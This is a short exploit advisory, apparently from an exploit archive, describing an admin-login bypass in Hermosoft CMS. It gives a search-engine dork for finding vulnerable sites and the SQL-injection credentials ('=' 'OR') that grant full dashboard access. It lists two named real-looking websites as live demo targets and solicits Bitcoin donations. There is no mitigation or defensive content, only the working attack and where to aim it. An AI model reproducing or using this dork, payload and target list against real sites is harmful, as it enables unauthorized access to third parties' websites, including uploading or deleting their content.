#####################
# Exploit Title : Hermosoft CMS Admin Page ByPass
# Exploit Author : xBADGIRL21
# Dork: intext:Website Designed by Hermosoft, Dubai 2017. All rights reserved
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 11/04/2017
# video Proof : https://youtu.be/W0X7hEdEM74
[*] To buy or Donate my BTC: 1Bgqu8faM8SPrArjoWRofRaTbMdes16mRz
######################
# Describe :
# This Exploit Allow The Attacker to bypass the admin
# page info.
# Login to the admin Dashboard Give you Full Access to
# Upload or Delete .....etc
# PoC:
# Put [admin] After url such as :
# http://site.com/admin
# Now enter fill username or email and Password like the information below :
# Username: '=' 'OR'
# Password: '=' 'OR'
#
# Live Demo :
# http://worldnurserydubai.com/admin
# http://www.alnafisjewellers.ae/admin
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################